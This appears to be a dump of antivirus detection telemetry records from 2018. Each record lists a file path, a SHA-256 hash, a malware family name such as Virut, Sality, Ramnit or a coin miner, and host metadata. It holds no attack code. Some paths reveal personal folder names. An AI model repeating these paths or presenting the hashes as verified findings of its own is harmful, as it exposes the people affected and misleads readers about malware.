  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T11:49:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-210506-19cb03e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-210506-19CB03E3', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:04:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msinfo32.exe', filepath='C:\\Windows\\System32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='137e9f3a29c0dbea1e928b20a4ef1e562c63ff12ab657865479d9bc28171fdd1', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T05:48:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cc.exe', filepath='D:\\the lasted software\\ANSYS process\\ANSYS Inc\\v120\\fluent\\ntbin\\win64\\cc.exe', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='18ac69750e5cfc3f7cf1a42e7c197d738810364bbe4e6a13d3c5518b2a6814e2', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T12:21:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='norma perempuan.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\NOTULEN\\pengawasan norma perempuan\\norma perempuan.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='TR/Patched.Gen.#M300.#R2947'), hash='0de2186f822b93d071a20fe2c6b0ab283b0d6c90f1c280e34ab915fca0cb8028', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T09:50:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='48a07d206766668dc64f4cb3d694cdb58b6e81ae049a68eaecee91bb82d17119.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-15.available\\Avira\\48A07D206766668DC64F4CB3D694CDB58B6E81AE049A68EAECEE91BB82D17119.VIR', filesize=328000, name='TR/Dropper.Gen.#M300.#R2295'), hash='48a07d206766668dc64f4cb3d694cdb58b6e81ae049a68eaecee91bb82d17119', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:31:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='danh sách cán bộ chiến sĩ đội csđt.exe', filepath='H:\\\xa0\\Chuyen an ĐB718\\DANH SÁCH CÁN BỘ CHIẾN SĨ ĐỘI CSĐT.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='2746d627a74abb289fe81c0d6089d3ba15a83f056059d2030f5a76ec124a69db', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:29:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:26:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='51603afd52f3a3315dd309d6ec3c0eb10da48c28944f93ba8675d8e27e9e9f94.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-19.available\\Avira\\51603AFD52F3A3315DD309D6EC3C0EB10DA48C28944F93BA8675D8E27E9E9F94.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='51603afd52f3a3315dd309d6ec3c0eb10da48c28944f93ba8675d8e27e9e9f94', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:46:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Windows Defender\\MsMpEng.exe', parentsize=107136, timestamp='2018-11-01T04:34:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T08:20:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='213691076015634.acv.zzz', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\213691076015634.acv.zzz', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160312-0a843c85', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160312-0A843C85', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:03:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155947-e7efbdb5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155947-E7EFBDB5', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:59:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jet40sp5_9xnt.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\aes731\\aspenonev7.3dvd1\\core\\mdac27sp1\\Jet40SP5_9xNT.exe', filesize=2752000, name='W32/Virut.Gen.#M1.#R1'), hash='3c62c512ced629a03d08b8bd48dfc67b23a6d2c7ac7aaf73e307c050806188bc', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe782_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe782 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T14:41:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='favorites.bat', filepath='C:\\Users\\X\\Favorites\\Favorites.bat', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T08:10:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='{e303ba32-9368-4a3c-ae3a-afdadcbde48b}.scr', filepath='C:\\Users\\X\\CyberLink\\OLReg\\HKEY_CLASS_ROOT\\CLSID\\{E303BA32-9368-4a3c-AE3A-AFDADCBDE48B}\\{E303BA32-9368-4a3c-AE3A-AFDADCBDE48B}.scr', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T07:36:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Media Network Sharing\\MsieXEc64.Exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:35:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110231-33d846f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_68ba5657\\AVSCAN-20181101-110204-2F20D71F\\AVSCAN-20181101-110231-33D846F5', filesize=1536000, name='PUA/AD.BitcoinMiner.B.#M1.#R1'), hash='6b937ff378a8e871cc9ff12d5a7079b3ffc4e41234bac993f88fe6b49fbc37f1', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:02:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-092500-bea47c48', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e97d068\\AVSCAN-20181101-092410-B6C41C15\\AVSCAN-20181101-092500-BEA47C48', filesize=768000, name='TR/Dropper.Gen.#M1.#R1'), hash='d1a821971ed8642d258ee65db27b91fddd28d902f9ec4e17322a39ee7beb6b5d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T02:25:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00006824', filepath='C:\\Windows\\Temp\\e73a0538-c507-43c3-9910-d6997c4f2634\\tmp000003bf\\tmp00006824', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='85c661e1d400137f32316ce58ece6cf3f2ddb4bf9595a2321863e97658bc579e', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-01T15:25:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-063457-c422caf8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_be769b8a\\AVSCAN-20181101-063327-B4BA4006\\AVSCAN-20181101-063457-C422CAF8', filesize=832000, name='HEUR/AGEN.1035486.#M1.#R1'), hash='5890aa5913029b55ee7100865dd3e543f169ce1b9fc1d7557decf16cde38a924', metadata=Row(cmdline=None, country='PY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:35:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nmworker.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\.micro_miner\\resources\\nvidia\\18\\nmworker.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:19:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112146-4c411424', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-112146-4C411424', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:21:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sculpteouploader.exe', filepath='C:\\Program Files\\Pixologic\\ZBrush 4R8\\ZStartup\\ZPlugs64\\SculpteoData\\Uploader\\SculpteoUploader.exe', filesize=5000000, name='HEUR/AGEN.1028299.#M1.#R1'), hash='b6eec48c274983f3fd910068c1587c2491d810594440a0551dc5d9c577949d3b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\ZBrush 4R8 P2 + Keyshot Bridge\\Update\\ZBrush_4R8_P2_Updater.exe', parentsize=111780192, timestamp='2018-11-01T19:32:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rkbatchtool.exe', filepath='E:\\Box Files\\SPDMTK_FILES\\Torque\\DROIDZ DUO Slim\\Rockchip_Batch_Tool_v1.7\\Rockchip_Batch_Tool_v1.7\\RKBatchTool.exe', filesize=1024000, name='W32/Sality.AG.#M1.#R1'), hash='b51869f1de40bbb17a0f5f60dda65df7887ea8772d17f3e7a3a6bf06f15d922d', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\BlueStacks\\HD-Network.exe', parentsize=451800, timestamp='2018-11-01T06:34:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191327-4643de30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-191327-4643DE30', filesize=64000, name='TR/Agent.64000.118.#M1.#R1'), hash='881c0e605130cfd9eca8ca14e5402a53a6b365a579221d829f5d80cd7447bb51', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:13:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1_4_12_4.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\1_4_12_4.html', filesize=224000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='98f17d31323b54dd8415193a7a004693c35241c32ac38c9c36374d1b0de0e9bc', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:41:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='beservice.exe', filepath='\\?\\J:\\BlackShot\\System\\BattlEye\\BEService.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='ebfe0f474931e4fd93a47652046d02393375a784cb7e906f0b551235b63807c0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fc3d3dce2f52363991d21e557f8a2207d34172cf', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\fc3d3dce2f52363991d21e557f8a2207d34172cf', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='d79bef3a8396520da748a2f7bc305cad523e62ac940e01621e36e17399bb2e5f', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T02:38:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091054-b1de0bf6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32700320\\AVSCAN-20181101-085751-44C2A5D6\\AVSCAN-20181101-091054-B1DE0BF6', filesize=34488000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='885a5e231bfa625466aea0661ba90b13ca00a3238d9107b2bbc68da2bdaeaf49', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:11:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110953-f25cb1fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110953-F25CB1FB', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:09:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='айгуль.exe', filepath='F:\\АЙГУЛЬ.exe', filesize=128000, name='TR/Crypt.ULPM.Gen.#M300.#R4257'), hash='e044b8c755f55c6834f5c9bf53e931f5f40b13b67adf1eb7ce5312935a1006f2', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T09:10:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141136-eb8d4a20', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a0197bd9\\AVSCAN-20181101-140354-BD0DC590\\AVSCAN-20181101-141136-EB8D4A20', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:11:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-121437-151b845e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-121404-F8BFF8C1\\AVSCAN-20181101-121437-151B845E', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:14:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='skypebrowserhost.exe', filepath='C:\\Program Files (x86)\\Skype\\Browser\\SkypeBrowserHost.exe', filesize=316000, name='W32/Jeefo.A.#M1.#R1'), hash='d71e41ff47dfee3dae7e2ad033dc2f83ebf992acf4d0c5ca531c84e6c84b1f5d', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:I\\\\\\/IYlszboUSLZa5D.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T11:52:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jewelquest.exe', filepath='C:\\Program Files\\GameHouse\\JewelQuest\\JewelQuest.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='d7388e48476a747697edc7a875d41f0df0e39033a44e40a82904e4aca8aeabb6', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T11:06:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T23:45:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151701-97a7d60b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_15112da0\\AVSCAN-20181101-125042-39787734\\AVSCAN-20181101-151701-97A7D60B', filesize=832000, name='ADWARE/Adware.Gen7.#M1.#R1'), hash='699ec6d2fade16809fd646e630acf25f547e3f77ccfd0dabfd3cfe0d3a43ceda', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:16:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-090657-0cf79d9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9aa61a38\\AVSCAN-20181101-223138-2600B995\\AVSCAN-20181102-090657-0CF79D9F', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:32:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T07:55:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-120548-5832cc39', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7ba0b925\\AVSCAN-20181101-115803-149AC36B\\AVSCAN-20181101-120548-5832CC39', filesize=248000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='3e58570b217dc362b4163f0ec0e2efc426ea2d4dd4a23e65243fceba05cb7a92', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:05:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T01:14:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-113349-9262a157', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5c23db29\\AVSCAN-20181101-102907-1E6BA40B\\AVSCAN-20181101-113349-9262A157', filesize=256000, name='RKit/Agent.marf.#M1.#R1'), hash='829ff334cdcfe87bbe5780fb8e696d8fa45420845c6d50dd1d29d0d2ead41b2a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:33:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T23:21:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-230253-432cc557', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d335eb84\\AVSCAN-20181101-230240-4095B43B\\AVSCAN-20181101-230253-432CC557', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:02:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124209-f1d8babe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9933c879\\AVSCAN-20181025-214701-39F5EF82\\AVSCAN-20181101-124209-F1D8BABE', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:41:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T21:36:11Z'), dt=datetime.date(2018, 11, 1)),
